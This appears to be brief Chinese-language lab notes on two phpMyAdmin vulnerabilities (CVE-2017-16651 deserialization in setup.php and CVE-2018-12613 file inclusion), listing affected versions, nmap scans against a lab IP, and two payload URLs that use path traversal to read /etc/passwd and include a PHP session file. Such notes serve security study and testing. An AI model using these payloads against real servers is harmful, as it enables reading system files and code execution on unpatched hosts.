(CVE-2017-16651)(CVE-2018-12613)
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)(CVE-2017-16651)
影响范围:phpMyAdmin 4.0.x版本,包括4.0.0至4.0.10.20版本; phpMyAdmin 4.4.x版本,包括4.4.0至4.4.15.10版本;phpMyAdmin 4.6.x版本,包括4.6.0至4.6.6版本
信息收集:nmap 192.168.85.130 –script=http-php-version -A
phpmyadmin文件包含漏洞(CVE-2018-12613)
影响范围:phpMyAdmin 4.8.x版本,包括4.8.0至4.8.2版本
信息收集:nmap 192.168.85.130 -A
payload:http://192.168.85.130:8080/index.php?target=db_sql.php%253f/../../../../../../../etc/passwd
payload:http://192.168.85.130:8080/index.php?target=sql.php?/../../../../../../../../../tmp/sess_82d7dfa88830c112d03b2f260b229798
